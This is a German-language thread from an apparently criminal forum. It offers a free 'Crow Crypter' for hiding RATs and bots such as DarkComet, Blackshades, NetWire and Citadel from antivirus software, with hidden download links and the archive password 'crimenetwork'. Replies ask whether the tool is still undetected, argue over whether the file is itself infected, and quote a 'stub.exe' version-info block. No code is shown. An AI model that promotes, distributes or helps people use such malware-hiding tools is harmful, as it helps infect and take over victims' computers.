13 Antworten in diesem Thema

[th0m4scobain]

EBENFALLS VON CNW , WIE IMMER BITTE IN VM AUSFÜHREN !

Biete euch hier ein sehr guten Crypter for free an...

Please Login HERE or Register HERE to see this link!

Crow Crypter works with :

[*]Extreme RAT
[*]Blackshades NET
[*]BlackShades Commander
[*]NetWire
[*]BetaBot
[*]Andromeda
[*]Madness Pro DDoS Bot
[*]Solar
[*]Ze*s
[*]Spynet
[*]Citadel
[*]Athena HTTP Bot
[*]Ganja IRC Bot
[*]Dark Commet
[*]Pro RAT
[*]xDosser
[*]IP Killer
[*]PlasmaRAT
[*]AND MORE

download:

Please Login HERE or Register HERE to see this link!

Passwort zum entpacken : crimenetwork

[Cube]

Hab jetzt nicht checked ob der infected ist.
Auf der VM mit Darkcomet rennt er allerdings ohne Probleme.

[th0m4scobain]

kann wie gesagt nichts dazu sagen , ich hab 2 crypter hier das reicht momentan

[odun96]

angeblich falsches Passwort?

[Framerater]

Bei mir hat das Passwort funktioniert.

[4cyberbase]

Password geht aber nicht habs schon 20 mal eingegeben

[Cube]

Password geht aber nicht habs schon 20 mal eingegeben

Vielleicht gabs ein Fehler beim Download.
Vermutlich Beschädigtes Archiv.
Lads nochma neu

[funstyler]

ist der atm. noch fud?

[Juri]

Wie wärs wenn du selber 2 Minuten investierst und es selber mal ausprobierst?

[FakeKeyUser]

Ist infiziert.

http://anonscanner.com/image/s24msxu9om

Außerdem wurde die .exe schonmal mit einer stub gebunden

BLOCK "000004b0"
{
VALUE "FileDescription", "ConsoleApplication1"
VALUE "FileVersion", "1.0.0.0"
VALUE "InternalName", "stub.exe"
VALUE "LegalCopyright", "Copyright ?© 2013"
VALUE "OriginalFilename", "stub.exe"
VALUE "ProductName", "ConsoleApplication1"
VALUE "ProductVersion", "1.0.0.0"
VALUE "Assembly Version", "1.0.0.0"
}

[Cube]

Ist infiziert.

Please Login HERE or Register HERE to see this link!

Außerdem wurde die .exe schonmal mit einer stub gebunden

BLOCK "000004b0"
{
VALUE "FileDescription", "ConsoleApplication1"
VALUE "FileVersion", "1.0.0.0"
VALUE "InternalName", "stub.exe"
VALUE "LegalCopyright", "Copyright ?© 2013"
VALUE "OriginalFilename", "stub.exe"
VALUE "ProductName", "ConsoleApplication1"
VALUE "ProductVersion", "1.0.0.0"
VALUE "Assembly Version", "1.0.0.0"
}

Klär mich auf. Woher weist du jetzt, dass das Ding 100% infected ist?
Der Virenscan sagt bei einem Crypter genau gar nichts aus haha.

Und Das Assembly auch nicht umbedingt.
Wenn du ne Verbindung nach draußen mitgesnifft hast, wäre deine Äußerung bezüglich der Infektion gerecht.

Regards

[FakeKeyUser]

Klär mich auf. Woher weist du jetzt, dass das Ding 100% infected ist?
Der Virenscan sagt bei einem Crypter genau gar nichts aus haha.

Und Das Assembly auch nicht umbedingt.
Wenn du ne Verbindung nach draußen mitgesnifft hast, wäre deine Äußerung bezüglich der Infektion gerecht.

Regards

Ich kann gerne nochmals schauen ob eine Verbindung nach draußen besteht.
Aber verrate mir eins...

Wer bindet sein Programm mit einer stub? Bestimmt keiner der einem was gutes will

Mfg

[blue_eyed_devil]

warum wurde eigentlich kein AV SCAN zu diesen tool gepostet vom thread-starter?? und zu dem infect-wenn das password schon "crimenetwork"...muss man nix zu sagen^^

[Cube]

Ich kann gerne nochmals schauen ob eine Verbindung nach draußen besteht.
Aber verrate mir eins...

Wer bindet sein Programm mit einer stub? Bestimmt keiner der einem was gutes will
Mfg

Nur weil im Assembly "Stub" steht muss es nicht von Haus aus gleich etwas böses sein.
Ich will nicht bestreiten, dass es verdächtig aussieht.
Allerdings ist mir auch schön öfters passiert, dass ich Builder mit Stub verwechselt habe beim Programmieren (also lediglich die Projektmappename).
Dadurch heißt mein Programm dann Builder.exe aber im Assembly kommt dann "Stub" vor wenn ich es nicht manuell ändere

Desweiteren hat der Begriff "Stub" nicht immer etwas mit bösen Aktivitäten zu tun.
Wenn man sich den neusten Firefox von der orginalseite downloaded, heißt die install datei auch stub (zumindest war es früher so).
Wollte ich nur erwähnt haben